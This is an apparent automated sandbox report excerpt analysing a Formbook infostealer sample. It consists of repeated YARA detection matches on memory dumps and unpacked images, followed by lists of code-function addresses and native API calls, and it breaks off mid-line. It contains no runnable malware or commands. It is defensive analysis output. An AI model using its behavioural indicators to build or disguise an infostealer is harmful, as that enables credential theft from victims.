          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: cK1g5gckZR9VHjj.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_008E5C240_2_008E5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_02B982500_2_02B98250
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 0_2_02B9D2F80_2_02B9D2F8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 1_2_002F5C241_2_002F5C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BC782_2_0041BC78
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00408C7B2_2_00408C7B
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00408C802_2_00408C80
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BD012_2_0041BD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041BEE02_2_0041BEE0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041CFB62_2_0041CFB6
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00565C242_2_00565C24
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010041202_2_01004120
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFB0902_2_00FFB090
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010A10022_2_010A1002
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010120A02_2_010120A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B20A82_2_010B20A8
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B28EC2_2_010B28EC
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FEF9002_2_00FEF900
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2B282_2_010B2B28
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0101EBB02_2_0101EBB0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010ADBD22_2_010ADBD2
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B22AE2_2_010B22AE
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2D072_2_010B2D07
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1D552_2_010B1D55
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010125812_2_01012581
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B25DD2_2_010B25DD
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FF841F2_2_00FF841F
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FFD5E02_2_00FFD5E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AD4662_2_010AD466
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00FE0D202_2_00FE0D20
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B1FF12_2_010B1FF1
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010AD6162_2_010AD616
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01006E302_2_01006E30
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010B2EF72_2_010B2EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388DBD212_2_0388DBD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892B2812_2_03892B28
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037FEBB012_2_037FEBB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038922AE12_2_038922AE
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E412012_2_037E4120
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037CF90012_2_037CF900
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038920A812_2_038920A8
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038928EC12_2_038928EC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388100212_2_03881002
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0389E82412_2_0389E824
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F20A012_2_037F20A0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DB09012_2_037DB090
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891FF112_2_03891FF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037E6E3012_2_037E6E30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892EF712_2_03892EF7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388D61612_2_0388D616
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_038925DD12_2_038925DD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037C0D2012_2_037C0D20
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03892D0712_2_03892D07
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037DD5E012_2_037DD5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_03891D5512_2_03891D55
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037F258112_2_037F2581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_037D841F12_2_037D841F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_0388D46612_2_0388D466
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBEE012_2_02DDBEE0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDCFB612_2_02DDCFB6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC2FB012_2_02DC2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC8C8012_2_02DC8C80
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBC7812_2_02DDBC78
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC8C7B12_2_02DC8C7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DC2D9012_2_02DC2D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 12_2_02DDBD0112_2_02DDBD01
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: String function: 00FEB150 appears 35 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 037CB150 appears 35 times
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004185E0 NtCreateFile,2_2_004185E0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00418690 NtReadFile,2_2_00418690
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_00418710 NtClose,2_2_00418710
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004187C0 NtAllocateVirtualMemory,2_2_004187C0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004185DA NtCreateFile,2_2_004185DA
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_0041870C NtReadFile,NtClose,2_2_0041870C
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_004187BA NtAllocateVirtualMemory,2_2_004187BA
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01029910
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010299A0 NtCreateSection,LdrInitializeThunk,2_2_010299A0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029840 NtDelayExecution,LdrInitializeThunk,2_2_01029840
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01029860
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_010298F0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01029A00
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A20 NtResumeThread,LdrInitializeThunk,2_2_01029A20
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029A50 NtCreateFile,LdrInitializeThunk,2_2_01029A50
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029540 NtReadFile,LdrInitializeThunk,2_2_01029540
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_010295D0 NtClose,LdrInitializeThunk,2_2_010295D0
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exeCode function: 2_2_01029710 NtQueryInformationToken,LdrInitializeThunk,2_2_01029710
          Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe